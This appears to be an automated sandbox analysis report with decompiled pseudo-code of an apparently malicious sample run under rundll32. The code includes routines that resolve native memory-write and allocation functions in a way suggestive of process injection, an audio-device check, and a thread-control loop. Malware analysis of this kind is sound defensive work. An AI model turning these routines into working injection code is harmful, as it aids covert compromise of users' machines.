                                                            • Opcode ID: 1ba8482ebfc2e0b663795ab6eb20c1cf68771c9715bc41139843c97dba0b0d54
                                                            • Instruction ID: 7eaec0fcb26947642b36056d0623754a1deff926b412b52bb5086496005922fb
                                                            • Opcode Fuzzy Hash: 1ba8482ebfc2e0b663795ab6eb20c1cf68771c9715bc41139843c97dba0b0d54
                                                            • Instruction Fuzzy Hash: AA418B31A003086BE7249F74CC89BBAB7B8EF55715F1042ACE90DA7292FF707A848750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 60%
                                                            			E04648EC0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				char _t11;
                                                            				intOrPtr* _t16;
                                                            				intOrPtr _t27;
                                                            				void* _t28;
                                                            				intOrPtr _t30;
                                                            				_Unknown_base(*)()* _t31;
                                                            				intOrPtr _t33;
                                                            				void* _t34;
                                                            				intOrPtr* _t35;
                                                            				struct HINSTANCE__* _t36;
                                                            				intOrPtr _t39;
                                                            				void* _t41;
                                                            
                                                            				_t33 = __edx;
                                                            				_t39 =  *0x4687b54; // 0x7ffc
                                                            				_t27 = __edx;
                                                            				_v8 = __ecx;
                                                            				_t30 =  *0x4687b50; // 0x320ea6c0
                                                            				_push(_t34);
                                                            				if(_t30 != 0 || _t39 != 0) {
                                                            					L7:
                                                            					_t35 = _a16;
                                                            					if(_t35 == 0) {
                                                            						_t11 = 0;
                                                            					} else {
                                                            						_t11 =  *_t35;
                                                            					}
                                                            					_v20 = _t11;
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					_push( &_v20);
                                                            					_push(0);
                                                            					_push(_a12);
                                                            					_v16 = 0;
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					_push(_t27);
                                                            					_push(_a8);
                                                            					asm("cdq");
                                                            					_t28 = E046481B0(_t30, _t39, 5, _v8, _t33, _a4);
                                                            					if(_t28 != 0 || _t33 != 0) {
                                                            						_t16 =  *0x4687b48;
                                                            						if(_t16 == 0) {
                                                            							L17:
                                                            							_t36 = GetModuleHandleW(L"ntdll.dll");
                                                            							 *0x4687b48 = GetProcAddress(_t36, "RtlNtStatusToDosError");
                                                            							_t31 = GetProcAddress(_t36, "RtlSetLastWin32Error");
                                                            							_t16 =  *0x4687b48;
                                                            							 *0x4687b28 = _t31;
                                                            						} else {
                                                            							_t31 =  *0x4687b28;
                                                            							if(_t31 == 0) {
                                                            								goto L17;
                                                            							}
                                                            						}
                                                            						if(_t16 != 0 && _t31 != 0) {
                                                            							RtlRestoreLastWin32Error( *_t16(_t28));
                                                            						}
                                                            						goto L21;
                                                            					} else {
                                                            						if(_t35 != 0) {
                                                            							 *_t35 = _v20;
                                                            						}
                                                            						return 1;
                                                            					}
                                                            				} else {
                                                            					_t25 =  *0x4687b40; // 0x32050000
                                                            					_t33 =  *0x4687b44; // 0x7ffc
                                                            					if(_t25 == 0 && _t33 == 0) {
                                                            						 *0x4687b40 = L04648390(_t30);
                                                            						 *0x4687b44 = _t33;
                                                            					}
                                                            					_t30 = L04648B90(_t27, "NtWriteVirtualMemory", _t33, _t34, _t39, _t25, _t33);
                                                            					_t41 = _t41 + 8;
                                                            					 *0x4687b50 = _t30;
                                                            					_t39 = _t33;
                                                            					 *0x4687b54 = _t39;
                                                            					if(_t30 != 0 || _t39 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						L21:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0464BFF5,046490E9,00000000), ref: 04648FA6
                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04648FBA
                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04648FC7
                                                            • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04648FE2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
• Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                            • String ID: NtWriteVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                            • API String ID: 3496116238-1394624420
                                                            • Opcode ID: 9ea417efe3c837e6150c003dc69f0229e0f462a56bd22c32f7edc16ecc3bbc47
                                                            • Instruction ID: 5130e0296daaa507cbb4995eb76b68322eafbc78dd2db47898165724abef8b6c
                                                            • Opcode Fuzzy Hash: 9ea417efe3c837e6150c003dc69f0229e0f462a56bd22c32f7edc16ecc3bbc47
                                                            • Instruction Fuzzy Hash: 71315079A11205ABDF64AE59AC40A7A77ABEBD87A5B14112DFD08D3300F734AC008BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 51%
                                                            			E04648C60(intOrPtr __ecx, char __edx) {
                                                            				intOrPtr _v8;
                                                            				void* _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t13;
                                                            				char _t23;
                                                            				void* _t24;
                                                            				_Unknown_base(*)()* _t26;
                                                            				char _t28;
                                                            				intOrPtr _t31;
                                                            				struct HINSTANCE__* _t32;
                                                            				intOrPtr _t33;
                                                            				void* _t35;
                                                            
                                                            				_t28 = __edx;
                                                            				_t33 =  *0x4687b34; // 0x7ffc
                                                            				_t23 = __edx;
                                                            				_t31 =  *0x4687b30; // 0x320ea280
                                                            				_v8 = __ecx;
                                                            				if(_t31 != 0 || _t33 != 0) {
                                                            					L7:
                                                            					_push(0);
                                                            					_push(0x40);
                                                            					_push(0);
                                                            					_push(0x3000);
                                                            					_v28 = _t23;
                                                            					asm("cdq");
                                                            					asm("xorps xmm0, xmm0");
                                                            					_push(_t28);
                                                            					_push( &_v28);
                                                            					_push(0);
                                                            					_push(0);
                                                            					asm("movlpd [ebp-0x10], xmm0");
                                                            					asm("cdq");
                                                            					_push(_t28);
                                                            					asm("cdq");
                                                            					_v24 = 0;
                                                            					_t24 = E046481B0(_t31, _t33, 6, _v8, _t28,  &_v20);
                                                            					if(_t24 != 0 || _t28 != 0) {
                                                            						_t13 =  *0x4687b48;
                                                            						if(_t13 == 0) {
                                                            							L12:
                                                            							_t32 = GetModuleHandleW(L"ntdll.dll");
                                                            							 *0x4687b48 = GetProcAddress(_t32, "RtlNtStatusToDosError");
                                                            							_t26 = GetProcAddress(_t32, "RtlSetLastWin32Error");
                                                            							_t13 =  *0x4687b48;
                                                            							 *0x4687b28 = _t26;
                                                            						} else {
                                                            							_t26 =  *0x4687b28;
                                                            							if(_t26 == 0) {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						if(_t13 != 0 && _t26 != 0) {
                                                            							RtlRestoreLastWin32Error( *_t13(_t24));
                                                            						}
                                                            						goto L16;
                                                            					} else {
                                                            						return _v20;
                                                            					}
                                                            				} else {
                                                            					_t21 =  *0x4687b40; // 0x32050000
                                                            					_t28 =  *0x4687b44; // 0x7ffc
                                                            					if(_t21 == 0 && _t28 == 0) {
                                                            						 *0x4687b40 = L04648390(__ecx);
                                                            						 *0x4687b44 = _t28;
                                                            					}
                                                            					_t31 = L04648B90(_t23, "NtAllocateVirtualMemory", _t28, _t31, _t33, _t21, _t28);
                                                            					_t35 = _t35 + 8;
                                                            					 *0x4687b30 = _t31;
                                                            					_t33 = _t28;
                                                            					 *0x4687b34 = _t33;
                                                            					if(_t31 != 0 || _t33 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						L16:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,?,?,74CB57B0,00000000,0464BFF5), ref: 04648D3E
                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04648D52
                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04648D5F
                                                            • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04648D7A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                            • String ID: NtAllocateVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                            • API String ID: 3496116238-3017390355
                                                            • Opcode ID: ba0078821fd44f3704e76e02538802f77a72642d6216aaa36a9334d84088bfa4
                                                            • Instruction ID: 95cb905df2c895f41ffe4a8c4583bdf2a5798ca0effdad671a6826394d496fcc
                                                            • Opcode Fuzzy Hash: ba0078821fd44f3704e76e02538802f77a72642d6216aaa36a9334d84088bfa4
                                                            • Instruction Fuzzy Hash: 81319BB9A41305ABEB24FF559C40B7B77AAEBD4661F24515EED04E3340F774AC0046A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 64%
                                                            			E04648D90(intOrPtr __ecx, intOrPtr __edx, char _a4, intOrPtr _a8) {
                                                            				intOrPtr _v8;
                                                            				intOrPtr _v16;
                                                            				char _v20;
                                                            				intOrPtr _v24;
                                                            				char _v28;
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr* _t18;
                                                            				intOrPtr _t28;
                                                            				void* _t29;
                                                            				_Unknown_base(*)()* _t31;
                                                            				intOrPtr _t33;
                                                            				intOrPtr _t34;
                                                            				struct HINSTANCE__* _t35;
                                                            				intOrPtr _t36;
                                                            				void* _t38;
                                                            
                                                            				_t33 = __edx;
                                                            				_t36 =  *0x4687b24; // 0x7ffc
                                                            				_t28 = __edx;
                                                            				_t34 =  *0x4687b20; // 0x320ea340
                                                            				_v8 = __ecx;
                                                            				if(_t34 != 0 || _t36 != 0) {
                                                            					L7:
                                                            					_v28 = _a4;
                                                            					_push(0);
                                                            					_v24 = _a8;
                                                            					_push(0x4000);
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					_push( &_v20);
                                                            					_v20 = _t28;
                                                            					asm("cdq");
                                                            					_push(_t33);
                                                            					asm("cdq");
                                                            					_v16 = 0;
                                                            					_t29 = E046481B0(_t34, _t36, 4, _v8, _t33,  &_v28);
                                                            					if(_t29 != 0 || _t33 != 0) {
                                                            						_t18 =  *0x4687b48;
                                                            						if(_t18 == 0) {
                                                            							L12:
                                                            							_t35 = GetModuleHandleW(L"ntdll.dll");
                                                            							 *0x4687b48 = GetProcAddress(_t35, "RtlNtStatusToDosError");
                                                            							_t31 = GetProcAddress(_t35, "RtlSetLastWin32Error");
                                                            							_t18 =  *0x4687b48;
                                                            							 *0x4687b28 = _t31;
                                                            						} else {
                                                            							_t31 =  *0x4687b28;
                                                            							if(_t31 == 0) {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						if(_t18 != 0 && _t31 != 0) {
                                                            							RtlRestoreLastWin32Error( *_t18(_t29));
                                                            						}
                                                            						goto L16;
                                                            					} else {
                                                            						_t11 = _t29 + 1; // 0x1
                                                            						return _t11;
                                                            					}
                                                            				} else {
                                                            					_t26 =  *0x4687b40; // 0x32050000
                                                            					_t33 =  *0x4687b44; // 0x7ffc
                                                            					if(_t26 == 0 && _t33 == 0) {
                                                            						 *0x4687b40 = L04648390(__ecx);
                                                            						 *0x4687b44 = _t33;
                                                            					}
                                                            					_t34 = L04648B90(_t28, "NtFreeVirtualMemory", _t33, _t34, _t36, _t26, _t33);
                                                            					_t38 = _t38 + 8;
                                                            					 *0x4687b20 = _t34;
                                                            					_t36 = _t33;
                                                            					 *0x4687b24 = _t36;
                                                            					if(_t34 != 0 || _t36 != 0) {
                                                            						goto L7;
                                                            					} else {
                                                            						L16:
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}

                                                            0x04648d90
                                                            0x04648d98
                                                            0x04648d9e
                                                            0x04648da1
                                                            0x04648da7
                                                            0x04648dac
                                                            0x04648e00
                                                            0x04648e03
                                                            0x04648e09
                                                            0x04648e0b
                                                            0x04648e11
                                                            0x04648e16
                                                            0x04648e17
                                                            0x04648e18
                                                            0x04648e1c
                                                            0x04648e1f
                                                            0x04648e20
                                                            0x04648e25
                                                            0x04648e2c
                                                            0x04648e38
                                                            0x04648e3f
                                                            0x04648e4f
                                                            0x04648e56
                                                            0x04648e62
                                                            0x04648e73
                                                            0x04648e83
                                                            0x04648e8a
                                                            0x04648e8c
                                                            0x04648e91
                                                            0x04648e58
                                                            0x04648e58
                                                            0x04648e60
                                                            0x00000000
                                                            0x00000000
                                                            0x04648e60
                                                            0x04648e99
                                                            0x04648ea3
                                                            0x04648ea3
                                                            0x00000000
                                                            0x04648e45
                                                            0x04648e45
                                                            0x04648e4e
                                                            0x04648e4e
                                                            0x04648db2
                                                            0x04648db2
                                                            0x04648db7
                                                            0x04648dbf
                                                            0x04648dca
                                                            0x04648dcf
                                                            0x04648dcf
                                                            0x04648de1
                                                            0x04648de3
                                                            0x04648de6
                                                            0x04648dec
                                                            0x04648dee
                                                            0x04648df6
                                                            0x00000000
                                                            0x04648eab
                                                            0x04648eab
                                                            0x04648eb1
                                                            0x04648eb1
                                                            0x04648df6

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,00000000,00000000,0464BFF5,?,?,04649227), ref: 04648E67
                                                            • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04648E7B
                                                            • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04648E88
                                                            • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04648EA3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                            • String ID: NtFreeVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                            • API String ID: 3496116238-2303597063
                                                            • Opcode ID: 0191b268ad32d15400ba3cd71f7df5d71e48b4cb9e6c0905e9df71838d324896
                                                            • Instruction ID: 2550df26b551b8443052fcc1c3b4305f28ee9cfb0b0d8d5e40a6f95f93b178c1
                                                            • Opcode Fuzzy Hash: 0191b268ad32d15400ba3cd71f7df5d71e48b4cb9e6c0905e9df71838d324896
                                                            • Instruction Fuzzy Hash: 6D319479A01215ABDB14EE55DC80A7BB7FAEBD8665F14512EED08D3300FB74AD008B90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E04632000(intOrPtr* __ecx, intOrPtr _a4, char _a7) {
                                                            				void* _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				void* __esi;
                                                            				intOrPtr _t18;
                                                            				intOrPtr _t23;
                                                            				intOrPtr _t29;
                                                            				intOrPtr* _t33;
                                                            				void* _t36;
                                                            
                                                            				_t18 = _a4;
                                                            				_t33 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t18;
                                                            				 *((intOrPtr*)(_t18 + 0x38)) = __ecx;
                                                            				 *(_t33 + 8) = CreateEventW(0, 1, 0, 0);
                                                            				 *_t33 = 0x467d858;
                                                            				if(waveInGetNumDevs() != 0) {
                                                            					_t47 =  *0x46878c8;
                                                            					if( *0x46878c8 == 0) {
                                                            						_t36 = L04655B14(CreateEventW, _t47, 0x5c);
                                                            						_t23 = E04631190(_t36, _t47);
                                                            						_push(_t36);
                                                            						_push(0x3f);
                                                            						 *((intOrPtr*)(_t33 + 0xc)) = _t23;
                                                            						_push(1);
                                                            						_push( &_a7);
                                                            						 *0x46878c8 = 1;
                                                            						_a7 = 0x7c;
                                                            						E04631C60( *((intOrPtr*)(_t33 + 4)));
                                                            						WaitForSingleObject( *(_t33 + 8), 0xffffffff);
                                                            						Sleep(0x96);
                                                            						_v24 = E04632220;
                                                            						_v20 = _t33;
                                                            						_v16 = 0;
                                                            						_v12 = CreateEventW(0, 0, 0, 0);
                                                            						_t29 = E0465F897( *((intOrPtr*)(_t33 + 4)), 0, 0, E04645400,  &_v24, 0, 0);
                                                            						WaitForSingleObject(_v12, 0xffffffff);
                                                            						CloseHandle(_v12);
                                                            						 *((intOrPtr*)(_t33 + 0x10)) = _t29;
                                                            					}
                                                            				}
                                                            				return _t33;
                                                            			}

                                                            0x04632003
                                                            0x04632011
                                                            0x04632019
                                                            0x0463201f
                                                            0x04632024
                                                            0x04632029
                                                            0x0463202c
                                                            0x0463203a
                                                            0x04632040
                                                            0x04632047
                                                            0x04632057
                                                            0x04632059
                                                            0x0463205e
                                                            0x04632062
                                                            0x04632064
                                                            0x0463206a
                                                            0x0463206c
                                                            0x0463206d
                                                            0x04632074
                                                            0x04632078
                                                            0x04632082
                                                            0x0463208d
                                                            0x0463209b
                                                            0x046320a2
                                                            0x046320a5
                                                            0x046320af
                                                            0x046320bf
                                                            0x046320ce
                                                            0x046320d7
                                                            0x046320dd
                                                            0x046320dd
                                                            0x04632047
                                                            0x046320e7

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04632027
                                                            • waveInGetNumDevs.WINMM ref: 04632032
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311A9
                                                              • Part of subcall function 04631190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0463205E), ref: 046311B6
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04632082
                                                            • Sleep.KERNEL32(00000096), ref: 0463208D
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 046320A9
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 046320CE
                                                            • CloseHandle.KERNEL32(?), ref: 046320D7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                            • String ID: |
                                                            • API String ID: 1906678132-2343686810
                                                            • Opcode ID: c24b75e7c444237e8e639251beadd78c0fa49d513cba3f671ba4605dd2de2338
                                                            • Instruction ID: 5b7b3722412fd388de8b91d548ee507aefce2c2bfbd7b4daec9c57dff4539563
                                                            • Opcode Fuzzy Hash: c24b75e7c444237e8e639251beadd78c0fa49d513cba3f671ba4605dd2de2338
                                                            • Instruction Fuzzy Hash: BA21D870A40304BFFB109F64DC89B597FA4EF04715F144159FA08AE2C1EBB5A940CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 81%
                                                            			E046399B0() {
                                                            				signed int _v8;
                                                            				short _v528;
                                                            				signed int _t9;
                                                            				signed int _t13;
                                                            				signed int _t14;
                                                            				void* _t16;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t23;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				void* _t28;
                                                            				signed int _t30;
                                                            
                                                            				_t9 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t9 ^ _t30;
                                                            				_push(_t22);
                                                            				_push(_t28);
                                                            				_push(_t26);
                                                            				_push(0);
                                                            				_t24 = L"winssyslog";
                                                            				E04646370(_t22, L"winssyslog",  &_v528, _t26, _t28, 8);
                                                            				_t13 = GetFileAttributesW( &_v528);
                                                            				_t27 = CloseHandle;
                                                            				_t23 = UnmapViewOfFile;
                                                            				_t14 = _t13 & 0xffffff00 | _t13 != 0xffffffff;
                                                            				 *0x46878c9 = _t14;
                                                            				L1:
                                                            				while(1) {
                                                            					if(_t14 != 0) {
                                                            						L4:
                                                            						E0463B600(_t23, _t24, _t27, _t36);
                                                            						_t14 =  *0x46878c9; // 0x0
                                                            						if(_t14 != 1) {
                                                            							L7:
                                                            							_t24 =  *0x4687adc; // 0x0
                                                            							if(_t24 != 0) {
                                                            								_t16 =  *(_t24 + 4);
                                                            								if(_t16 != 0) {
                                                            									TerminateThread(_t16, 0xffffffff);
                                                            									_t20 =  *0x4687adc; // 0x0
                                                            									CloseHandle( *(_t20 + 4));
                                                            									_t24 =  *0x4687adc; // 0x0
                                                            									 *(_t24 + 4) = 0;
                                                            								}
                                                            								UnmapViewOfFile(_t24);
                                                            								CloseHandle( *0x4687ad8);
                                                            								_t14 =  *0x46878c9; // 0x0
                                                            								 *0x4687adc = 0;
                                                            							}
                                                            							continue;
                                                            						}
                                                            						do {
                                                            							Sleep(0x64);
                                                            							_t14 =  *0x46878c9; // 0x0
                                                            						} while (_t14 == 1);
                                                            						goto L7;
                                                            					} else {
                                                            						do {
                                                            							Sleep(0x64);
                                                            							_t36 =  *0x46878c9;
                                                            						} while ( *0x46878c9 == 0);
                                                            						goto L4;
                                                            					}
                                                            				}
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04646396
                                                            • GetFileAttributesW.KERNEL32(?), ref: 046399E4
                                                            • Sleep.KERNEL32(00000064), ref: 04639A12
                                                            • Sleep.KERNEL32(00000064), ref: 04639A32
                                                            • TerminateThread.KERNEL32(?,000000FF), ref: 04639A51
                                                            • CloseHandle.KERNEL32(?), ref: 04639A5F
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 04639A6F
                                                            • CloseHandle.KERNEL32 ref: 04639A77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
                                                            • String ID: winssyslog
                                                            • API String ID: 3677296445-1874786851
                                                            • Opcode ID: 86c3e39392f8bb5b92a5a720b6952d118be49634de7ad22fa2f08c802bc69da5
                                                            • Instruction ID: 035f1c134ad19ee1d3870a4d22ca38137d5e5a09725f7c14fa5e70b20702ec48
                                                            • Opcode Fuzzy Hash: 86c3e39392f8bb5b92a5a720b6952d118be49634de7ad22fa2f08c802bc69da5
                                                            • Instruction Fuzzy Hash: 6E21E4B4600288EFD7149F65EC48B247FA5EB55316F64539CE45447382FB78AC05CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 95%
                                                            			E04637980(intOrPtr* __ecx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				_Unknown_base(*)()* _t15;
                                                            				_Unknown_base(*)()* _t16;
                                                            				_Unknown_base(*)()* _t17;
                                                            				void* _t21;
                                                            				intOrPtr _t22;
                                                            				struct HINSTANCE__* _t24;
                                                            				intOrPtr* _t26;
                                                            				intOrPtr* _t27;
                                                            
                                                            				_t25 = __ecx;
                                                            				_t27 = __ecx;
                                                            				_t1 = _t27 + 0x10; // 0x10
                                                            				_t26 = _t1;
                                                            				 *_t26 = 0;
                                                            				 *__ecx = 0;
                                                            				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                            				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                                                            				 *((short*)(__ecx + 0x18)) = 2;
                                                            				_t24 = LoadLibraryA("ntdll.dll");
                                                            				if(_t24 != 0) {
                                                            					_t15 = GetProcAddress(_t24, "RtlGetCompressionWorkSpaceSize");
                                                            					 *(_t27 + 4) = _t15;
                                                            					if(_t15 != 0) {
                                                            						_t16 = GetProcAddress(_t24, "RtlCompressBuffer");
                                                            						 *(_t27 + 8) = _t16;
                                                            						if(_t16 != 0) {
                                                            							_t17 = GetProcAddress(_t24, "RtlDecompressBuffer");
                                                            							 *(_t27 + 0xc) = _t17;
                                                            							if(_t17 != 0) {
                                                            								_t8 = _t27 + 0x14; // 0x14
                                                            								_t21 =  *( *(_t27 + 4))( *(_t27 + 0x18) & 0x0000ffff, _t26, _t8);
                                                            								_t35 = _t21;
                                                            								if(_t21 == 0) {
                                                            									_push( *_t26);
                                                            									_t22 = L04655B55(_t25, _t27, _t35);
                                                            									 *((intOrPtr*)(_t27 + 0x1c)) = _t22;
                                                            									if(_t22 != 0) {
                                                            										E0465DEA0(_t26, _t22, 0,  *_t26);
                                                            										 *_t27 = 1;
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t27;
                                                            			}

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0464B836), ref: 046379B0
                                                            • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 046379C2
                                                            • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 046379D5
                                                            • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 046379E8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                            • API String ID: 2238633743-2202537490
                                                            • Opcode ID: 3823a45f19c1ab46d6fb494bf65a36b140e24873960b8fac524e478b38ff4668
                                                            • Instruction ID: 03f0f9ed8f5e8430035886176da5d824bfe7405ad2e20dcc84bce78068a932df
                                                            • Opcode Fuzzy Hash: 3823a45f19c1ab46d6fb494bf65a36b140e24873960b8fac524e478b38ff4668
                                                            • Instruction Fuzzy Hash: 4F113AB46007029BE7309F66EC49B43BBF8EF58702F004829E846D6651FBB6F5048B60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0464C0A0() {
                                                            				long _t1;
                                                            				void* _t9;
                                                            				void* _t13;
                                                            				void* _t14;
                                                            
                                                            				_t9 = WaitForSingleObject;
                                                            				_t14 = Sleep;
                                                            				L1:
                                                            				_t10 = L"Dispatch";
                                                            				_t1 = E046494D0(_t9, L"Dispatch", _t13, _t14, _t15);
                                                            				_t15 = _t1;
                                                            				if(_t1 != 0) {
                                                            					__eflags = _t1 - 0x2fffffff;
                                                            					if(__eflags != 0) {
                                                            						_t13 = OpenThread(0x1fffff, 0, _t1);
                                                            						__eflags = _t13;
                                                            						if(__eflags != 0) {
                                                            							WaitForSingleObject(_t13, 0xffffffff);
                                                            							CloseHandle(_t13);
                                                            						}
                                                            						E0464C020(_t10, _t14, __eflags);
                                                            						Sleep(0x3e8);
                                                            					} else {
                                                            						Sleep(0x7d0);
                                                            						E046378B0(_t9, L"Dispatch", 0, _t13, _t14, __eflags);
                                                            						E0464C020(L"Dispatch", _t14, __eflags);
                                                            						Sleep(0x3e8);
                                                            					}
                                                            				} else {
                                                            					E0464C020(L"Dispatch", _t14, _t15);
                                                            					Sleep(0x3e8);
                                                            				}
                                                            				goto L1;
                                                            			}

                                                            APIs
                                                              • Part of subcall function 046494D0: wsprintfW.USER32 ref: 04649510
                                                              • Part of subcall function 046494D0: RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020119,?), ref: 0464954D
                                                              • Part of subcall function 046494D0: RegQueryValueExW.ADVAPI32(?,0467E09C,00000000,?,00000000,?), ref: 0464957C
                                                              • Part of subcall function 046494D0: RegCloseKey.ADVAPI32(?), ref: 04649592
                                                              • Part of subcall function 046494D0: wsprintfW.USER32 ref: 046495CB
                                                              • Part of subcall function 046494D0: OpenEventW.KERNEL32(001F0003,00000000,?), ref: 046495E2
                                                              • Part of subcall function 046494D0: CloseHandle.KERNEL32(00000000), ref: 046495ED
                                                            • Sleep.KERNEL32(000003E8), ref: 0464C0C8
                                                            • Sleep.KERNEL32(000007D0), ref: 0464C0D8
                                                            • Sleep.KERNEL32(000003E8), ref: 0464C0F0
